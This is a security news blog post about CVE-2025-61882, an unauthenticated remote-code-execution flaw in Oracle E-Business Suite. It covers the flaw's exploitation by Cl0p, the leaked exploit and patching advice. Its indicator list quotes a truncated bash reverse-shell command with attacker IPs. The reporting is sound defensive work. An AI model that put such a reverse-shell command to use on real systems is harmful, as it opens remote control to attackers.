Oracle’s 9.8 CVSS Nightmare: Cl0p Exploits CVE-2025-61882 in a Wave of Data Theft

1 Star2 Stars3 Stars4 Stars5 Stars (6 votes, average: 4.50 out of 5)
Loading...
Last Modified: October 13, 2025
Oracle Zero-Day Chaos

The infamous ransomware gang is back in the spotlight, this time targeting Oracle’s E-Business Suite, and yes, Oracle just dropped an emergency patch.

Late last week, Oracle confirmed what cybersecurity pros had feared. A critical zero-day vulnerability (CVE-2025-61882) was being actively exploited in the wild.

The flaw scores 9.8 on the CVSS scale, meaning it’s basically the cybersecurity equivalent of a Category-5 hurricane.

Attackers can remotely execute code without authentication, no username, no password, just a direct hit via HTTP. Once inside, they can completely take over Oracle’s Concurrent Processing component of the E-Business Suite.

Oracle’s own advisory said it best: This vulnerability is remotely exploitable without authentication… and may result in remote code execution.

Anyone with network access could hijack your Oracle server.

The Affected versions are 12.2.3 – 12.2.14 versions of E-Business Suite that are vulnerable.

The Exploit Leaked

Soon after the attacks came to light, a mysterious group calling themselves “Scattered Lapsus$ Hunters” leaked what they claimed was the actual exploit code on Telegram.

The leak included two Python scripts (exp.py and server.py) capable of opening reverse shells to the attacker’s server, the kind of code that keeps SOC teams awake at 3 AM.

Oracle’s indicators of compromise (IoCs) match what was leaked:

  • 200.107.207[.]26 (HTTP GET/POST activity)
  • 185.181.60[.]11 (HTTP GET/POST activity)
  • Reverse shell command: sh -c /bin/bash -i >& /dev/tcp/… 0>&1
  • Exploit archive: oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip

That’s not just a PoC floating around, it’s the real weapon Cl0p used in August’s massive data theft campaign.

Also Read: Critical Zero-Day Vulnerability Exploited in Fortinet Devices

The Cl0p Connection Between MOVEit and Oracle

Cl0p has a masterclass in zero-day exploitation that has been going on over the last few years:

  • 2020: Accellion FTA – 100+ orgs breached
  • 2021: SolarWinds serve-U FTP – remote takeover.
  • 2023: GoAnywhere MFT – 100+ companies hit.
  • 2023: MOVEit Transfer – 2,773 organisations attacked in the world.
  • 2024: Cleo file transfer 0days – double hit.
  • 2025: Oracle E-Business Suite – the newest trophy.

Mandiant CSO Charles Carmakal affirmed that Cl0p used numerous Oracle vulnerabilities, among them being patched in July, and the new zero-day was patched this weekend.

He warned, “Given the broad mass zero-day exploitation that has already occurred… organisations should examine whether they were already compromised.”

Behind the Scenes

Scattered Lapsus$ Hunters, a disorderly amalgamation of menace perpetrators purporting connections to Scattered Spider, Lapsus, and ShinyHunters, affirm to have initially built the exploit. Then somebody supposedly got it or sold it to Cl0p.

ShinyHunters said, That was mine… and came and said, It made me angry how it should be used by another group, so we leaked it. No hate to Cl0p.”

We are now in the drama of cybercriminals, the leakage of codes, and billion-dollar businesses madly rushing ahead to fix everything by the beginning of Monday morning.

Also Read: ToolShell Zero-day: U.S. CISA urges FCEB Agencies to Fix 2 Microsoft SharePoint Flaws Immediately

What You Should Do Right Now

  • Patch Immediately. Install the latest Oracle update and verify dependencies.
  • Check for Compromise. IoCs that are Oracle listed and their scan logs. Monitor the suspicious IPs and shell commands.
  • Isolate and Monitor. In case of some suspicious activity, you should shut down affected servers and initiate a forensic investigation.
  • Communicate Internally. Align adoption of IT, security, and management with the response plan. Silence kills speed.
  • Don’t Wait for the Next CVE. Cl0p has demonstrated that they can go on toes. Were you assuming that their opportunity window is your patch window?

Conclusion

In the end, Oracle’s scramble to patch CVE-2025-61882 isn’t just another vendor update. It’s a reminder that even enterprise-grade systems can fall overnight when cybercriminals move faster than the patch cycle. The Cl0p gang has proven, once again, that zero-day exploitation isn’t slowing down. It’s scaling up.

If your organisation uses Oracle E-Business Suite or any critical enterprise software, don’t wait for headlines to remind you what’s at stake. Act now, patch, investigate, and strengthen your defences.

Need help assessing your environment or ensuring you’re protected from the next big exploit? Contact us for cybersecurity consulting and services. Our experts can help secure your business before attackers find their way in.

Janki Mehta

Janki Mehta

Janki Mehta is a passionate Cyber-Security Enthusiast who keenly monitors the latest developments in the Web/Cyber Security industry. She puts her knowledge into practice and helps web users by arming them with the necessary security measures to stay safe in the digital world.